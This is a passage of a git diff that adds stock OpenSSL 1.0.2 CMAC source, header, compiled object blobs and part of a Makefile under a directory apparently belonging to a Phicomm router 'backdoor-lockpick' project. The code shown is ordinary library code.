z?jCq*;c43zBMw4}$RI6L7O=ABg&m}3&{MOxZnpb4{G1wqKg9Y5v22q(#~hBd<hJ~6
zWPNj4iTY7ie+<ir<jFf!R3{jt9~lVs34Pn32W^fZ1X+bIYNJyd9P^vVKzNMRP(MWp
zAu5)wl4ryblp2mX!;&}eYLl8APf1<?LCMo1xl#Wb>VeF`BZBI;NDZ$zgOc}{D-8M*
zk~b_hv`~E?sCZBh<Z*n#c#b)sJCFVq>NZG6hn<xL&0XZza;08p#giA;g0IGOD`$nB
zi@#Hc;D@dau*Hn?HqRN(3H67eM4@W~<z{%0zlRWnuXP0K$S+XJ)&=Taj88Dm{r57?
zheX$f={V`GV+~duWcn)0GhG*8FEjoeY)}-Mf2#`F!DDTvILVxu5Qvl9Q-$M&F<nm3
zCjL66%UiTrJ7WdjVSJ`1jO(861X}OHgL~O7qW~&#%zGvNRTchi6@Ie{cR=1N`LD0S
zmsH_vs_^wyczYH8OckzG;Rf*gg#B;{=1E0MDCvZ5^!qiEhTA~V5~`+XMrMG}S~lL7
z)QrJt4JDq88zi1Ilw5khYUqL??GgM8=xQ>T78D>vpPm!|hElRdMntLf5b;MtP527n
zYb{aQq8%;4sM68ex--(HbOl?Y5ru@d2180aj)vAkUAq+xjcKbjo>T`&WLKxMHLPG)
zRyUO10ktn{^~bEiPg*ARgHvvLGrCS~JD-m1QPeEvfxs}eM4IA0@MT@2Jwr(~p<`b>
z*{2vO1+G;R+Oemzt3#n)6quf>9Z<CX14^$NXNjdr!o*w4u!}7R-Z6N--+{XyWkBE$
z3j7U$;~B>FKNL8gO`KmA_!5E7hkb#9aYepT;9}fO0$&O?+<%9_9~Ss)jN|b%U*IPN
zeXqdJ3Ho^dasOXb(Z4G2M+E({;Af%0UF@91`FaI@zrdFXe2c&z75E;3HwxSoxR|$>
zKnDfmE`o>8>kdK?<YGSgiHOrcmw3LR@H2>We(vL*LE)U=HybTH$@zVgwsC&X@q3W_
z;q9VLpEW1P#r669<Yfvtc9s%Kw%9oL-)ZA~JbeFiKm6W3YSZWWdE3T$9zL*fo`>r;
z&d0w1Cj`Rd@;noNb|_(}Jy04MtL*2sj6R_H4SmocemE9Y;_u03i9eIV2C4`AaF|gg
zN}vXv{(+PR$CO`7B@%iPOp_@?_roXW8hUE5c3(2*PiInTJ!8PpNPX!2aJ=Bj^Ph+p
zyx^4WUkuH_P)>-82yK=g+J`SZgK!Tw!y`(XeNuRsJ%0b7E#Kb_OnC+4_Ak1xZE>0U
zjQFdW&wpzlVDZ=T0IcNk=h--)KQAN9-X5QSqE6no%#YXRuNm5v@^_@pQY=~p{ieq?
zvgdC%FdR!0)8oY@HX!<U0*6rYar06Yn4m^(&zO+a%k8-C^H7-$&y3~5Nr8Cjd+No<
z&xr{Y^l7*EGW(6TfOh+%U|T7F&Fq8wDhq^7{08OreE(I7jV8Nm@lD8amIwTI&jaw-
h?eUAcQmV$8V%|1>TNA#`D%&@(|1Z4?{i4|I{{d*k>}dc1

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cmac.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cmac.c
new file mode 100644
index 0000000..c5597a3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cmac.c
@@ -0,0 +1,296 @@
+/* crypto/cmac/cmac.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2010 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "cryptlib.h"
+#include <openssl/cmac.h>
+
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+
+struct CMAC_CTX_st {
+    /* Cipher context to use */
+    EVP_CIPHER_CTX cctx;
+    /* Keys k1 and k2 */
+    unsigned char k1[EVP_MAX_BLOCK_LENGTH];
+    unsigned char k2[EVP_MAX_BLOCK_LENGTH];
+    /* Temporary block */
+    unsigned char tbl[EVP_MAX_BLOCK_LENGTH];
+    /* Last (possibly partial) block */
+    unsigned char last_block[EVP_MAX_BLOCK_LENGTH];
+    /* Number of bytes in last block: -1 means context not initialised */
+    int nlast_block;
+};
+
+/* Make temporary keys K1 and K2 */
+
+static void make_kn(unsigned char *k1, unsigned char *l, int bl)
+{
+    int i;
+    /* Shift block to left, including carry */
+    for (i = 0; i < bl; i++) {
+        k1[i] = l[i] << 1;
+        if (i < bl - 1 && l[i + 1] & 0x80)
+            k1[i] |= 1;
+    }
+    /* If MSB set fixup with R */
+    if (l[0] & 0x80)
+        k1[bl - 1] ^= bl == 16 ? 0x87 : 0x1b;
+}
+
+CMAC_CTX *CMAC_CTX_new(void)
+{
+    CMAC_CTX *ctx;
+    ctx = OPENSSL_malloc(sizeof(CMAC_CTX));
+    if (!ctx)
+        return NULL;
+    EVP_CIPHER_CTX_init(&ctx->cctx);
+    ctx->nlast_block = -1;
+    return ctx;
+}
+
+void CMAC_CTX_cleanup(CMAC_CTX *ctx)
+{
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !ctx->cctx.engine) {
+        FIPS_cmac_ctx_cleanup(ctx);
+        return;
+    }
+#endif
+    EVP_CIPHER_CTX_cleanup(&ctx->cctx);
+    OPENSSL_cleanse(ctx->tbl, EVP_MAX_BLOCK_LENGTH);
+    OPENSSL_cleanse(ctx->k1, EVP_MAX_BLOCK_LENGTH);
+    OPENSSL_cleanse(ctx->k2, EVP_MAX_BLOCK_LENGTH);
+    OPENSSL_cleanse(ctx->last_block, EVP_MAX_BLOCK_LENGTH);
+    ctx->nlast_block = -1;
+}
+
+EVP_CIPHER_CTX *CMAC_CTX_get0_cipher_ctx(CMAC_CTX *ctx)
+{
+    return &ctx->cctx;
+}
+
+void CMAC_CTX_free(CMAC_CTX *ctx)
+{
+    CMAC_CTX_cleanup(ctx);
+    OPENSSL_free(ctx);
+}
+
+int CMAC_CTX_copy(CMAC_CTX *out, const CMAC_CTX *in)
+{
+    int bl;
+    if (in->nlast_block == -1)
+        return 0;
+    if (!EVP_CIPHER_CTX_copy(&out->cctx, &in->cctx))
+        return 0;
+    bl = EVP_CIPHER_CTX_block_size(&in->cctx);
+    memcpy(out->k1, in->k1, bl);
+    memcpy(out->k2, in->k2, bl);
+    memcpy(out->tbl, in->tbl, bl);
+    memcpy(out->last_block, in->last_block, bl);
+    out->nlast_block = in->nlast_block;
+    return 1;
+}
+
+int CMAC_Init(CMAC_CTX *ctx, const void *key, size_t keylen,
+              const EVP_CIPHER *cipher, ENGINE *impl)
+{
+    static unsigned char zero_iv[EVP_MAX_BLOCK_LENGTH];
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode()) {
+        /* If we have an ENGINE need to allow non FIPS */
+        if ((impl || ctx->cctx.engine)
+            && !(ctx->cctx.flags & EVP_CIPH_FLAG_NON_FIPS_ALLOW)) {
+            EVPerr(EVP_F_CMAC_INIT, EVP_R_DISABLED_FOR_FIPS);
+            return 0;
+        }
+        /*
+         * Other algorithm blocking will be done in FIPS_cmac_init, via
+         * FIPS_cipherinit().
+         */
+        if (!impl && !ctx->cctx.engine)
+            return FIPS_cmac_init(ctx, key, keylen, cipher, NULL);
+    }
+#endif
+    /* All zeros means restart */
+    if (!key && !cipher && !impl && keylen == 0) {
+        /* Not initialised */
+        if (ctx->nlast_block == -1)
+            return 0;
+        if (!EVP_EncryptInit_ex(&ctx->cctx, NULL, NULL, NULL, zero_iv))
+            return 0;
+        memset(ctx->tbl, 0, EVP_CIPHER_CTX_block_size(&ctx->cctx));
+        ctx->nlast_block = 0;
+        return 1;
+    }
+    /* Initialiase context */
+    if (cipher && !EVP_EncryptInit_ex(&ctx->cctx, cipher, impl, NULL, NULL))
+        return 0;
+    /* Non-NULL key means initialisation complete */
+    if (key) {
+        int bl;
+        if (!EVP_CIPHER_CTX_cipher(&ctx->cctx))
+            return 0;
+        if (!EVP_CIPHER_CTX_set_key_length(&ctx->cctx, keylen))
+            return 0;
+        if (!EVP_EncryptInit_ex(&ctx->cctx, NULL, NULL, key, zero_iv))
+            return 0;
+        bl = EVP_CIPHER_CTX_block_size(&ctx->cctx);
+        if (!EVP_Cipher(&ctx->cctx, ctx->tbl, zero_iv, bl))
+            return 0;
+        make_kn(ctx->k1, ctx->tbl, bl);
+        make_kn(ctx->k2, ctx->k1, bl);
+        OPENSSL_cleanse(ctx->tbl, bl);
+        /* Reset context again ready for first data block */
+        if (!EVP_EncryptInit_ex(&ctx->cctx, NULL, NULL, NULL, zero_iv))
+            return 0;
+        /* Zero tbl so resume works */
+        memset(ctx->tbl, 0, bl);
+        ctx->nlast_block = 0;
+    }
+    return 1;
+}
+
+int CMAC_Update(CMAC_CTX *ctx, const void *in, size_t dlen)
+{
+    const unsigned char *data = in;
+    size_t bl;
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !ctx->cctx.engine)
+        return FIPS_cmac_update(ctx, in, dlen);
+#endif
+    if (ctx->nlast_block == -1)
+        return 0;
+    if (dlen == 0)
+        return 1;
+    bl = EVP_CIPHER_CTX_block_size(&ctx->cctx);
+    /* Copy into partial block if we need to */
+    if (ctx->nlast_block > 0) {
+        size_t nleft;
+        nleft = bl - ctx->nlast_block;
+        if (dlen < nleft)
+            nleft = dlen;
+        memcpy(ctx->last_block + ctx->nlast_block, data, nleft);
+        dlen -= nleft;
+        ctx->nlast_block += nleft;
+        /* If no more to process return */
+        if (dlen == 0)
+            return 1;
+        data += nleft;
+        /* Else not final block so encrypt it */
+        if (!EVP_Cipher(&ctx->cctx, ctx->tbl, ctx->last_block, bl))
+            return 0;
+    }
+    /* Encrypt all but one of the complete blocks left */
+    while (dlen > bl) {
+        if (!EVP_Cipher(&ctx->cctx, ctx->tbl, data, bl))
+            return 0;
+        dlen -= bl;
+        data += bl;
+    }
+    /* Copy any data left to last block buffer */
+    memcpy(ctx->last_block, data, dlen);
+    ctx->nlast_block = dlen;
+    return 1;
+
+}
+
+int CMAC_Final(CMAC_CTX *ctx, unsigned char *out, size_t *poutlen)
+{
+    int i, bl, lb;
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !ctx->cctx.engine)
+        return FIPS_cmac_final(ctx, out, poutlen);
+#endif
+    if (ctx->nlast_block == -1)
+        return 0;
+    bl = EVP_CIPHER_CTX_block_size(&ctx->cctx);
+    *poutlen = (size_t)bl;
+    if (!out)
+        return 1;
+    lb = ctx->nlast_block;
+    /* Is last block complete? */
+    if (lb == bl) {
+        for (i = 0; i < bl; i++)
+            out[i] = ctx->last_block[i] ^ ctx->k1[i];
+    } else {
+        ctx->last_block[lb] = 0x80;
+        if (bl - lb > 1)
+            memset(ctx->last_block + lb + 1, 0, bl - lb - 1);
+        for (i = 0; i < bl; i++)
+            out[i] = ctx->last_block[i] ^ ctx->k2[i];
+    }
+    if (!EVP_Cipher(&ctx->cctx, out, out, bl)) {
+        OPENSSL_cleanse(out, bl);
+        return 0;
+    }
+    return 1;
+}
+
+int CMAC_resume(CMAC_CTX *ctx)
+{
+    if (ctx->nlast_block == -1)
+        return 0;
+    /*
+     * The buffer "tbl" containes the last fully encrypted block which is the
+     * last IV (or all zeroes if no last encrypted block). The last block has
+     * not been modified since CMAC_final(). So reinitliasing using the last
+     * decrypted block will allow CMAC to continue after calling
+     * CMAC_Final().
+     */
+    return EVP_EncryptInit_ex(&ctx->cctx, NULL, NULL, NULL, ctx->tbl);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cmac.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cmac.h
new file mode 100644
index 0000000..175be83
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cmac.h
@@ -0,0 +1,82 @@
+/* crypto/cmac/cmac.h */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2010 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#ifndef HEADER_CMAC_H
+# define HEADER_CMAC_H
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+# include <openssl/evp.h>
+
+/* Opaque */
+typedef struct CMAC_CTX_st CMAC_CTX;
+
+CMAC_CTX *CMAC_CTX_new(void);
+void CMAC_CTX_cleanup(CMAC_CTX *ctx);
+void CMAC_CTX_free(CMAC_CTX *ctx);
+EVP_CIPHER_CTX *CMAC_CTX_get0_cipher_ctx(CMAC_CTX *ctx);
+int CMAC_CTX_copy(CMAC_CTX *out, const CMAC_CTX *in);
+
+int CMAC_Init(CMAC_CTX *ctx, const void *key, size_t keylen,
+              const EVP_CIPHER *cipher, ENGINE *impl);
+int CMAC_Update(CMAC_CTX *ctx, const void *data, size_t dlen);
+int CMAC_Final(CMAC_CTX *ctx, unsigned char *out, size_t *poutlen);
+int CMAC_resume(CMAC_CTX *ctx);
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cmac.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cmac.o
new file mode 100644
index 0000000000000000000000000000000000000000..5627ce93f20555bb2b0288ed26d262ff25211c75
GIT binary patch
literal 5096
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/Makefile
new file mode 100644
index 0000000..b05daf6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/Makefile
@@ -0,0 +1,279 @@
+#
+# OpenSSL/crypto/cms/Makefile
+#
+
+DIR=	cms
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= cms_lib.c cms_asn1.c cms_att.c cms_io.c cms_smime.c cms_err.c \
+	cms_sd.c cms_dd.c cms_cd.c cms_env.c cms_enc.c cms_ess.c \
+	cms_pwri.c cms_kari.c
+LIBOBJ= cms_lib.o cms_asn1.o cms_att.o cms_io.o cms_smime.o cms_err.o \
+	cms_sd.o cms_dd.o cms_cd.o cms_env.o cms_enc.o cms_ess.o \
+	cms_pwri.o cms_kari.o
+
+SRC= $(LIBSRC)
+
+EXHEADER=  cms.h
+HEADER=	cms_lcl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+test:
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+cms_asn1.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_asn1.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_asn1.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_asn1.o: ../../include/openssl/e_os2.h ../../include/openssl/evp.h
+cms_asn1.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cms_asn1.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cms_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_asn1.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+cms_asn1.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+cms_asn1.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cms_asn1.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cms_asn1.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+cms_asn1.o: cms.h cms_asn1.c cms_lcl.h
+cms_att.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_att.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_att.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_att.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_att.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_att.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_att.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_att.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_att.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_att.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_att.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_att.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_att.o: ../../include/openssl/x509v3.h cms.h cms_att.c cms_lcl.h
+cms_cd.o: ../../e_os.h ../../include/openssl/asn1.h
+cms_cd.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+cms_cd.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_cd.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_cd.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_cd.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_cd.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_cd.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_cd.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_cd.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_cd.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_cd.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_cd.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
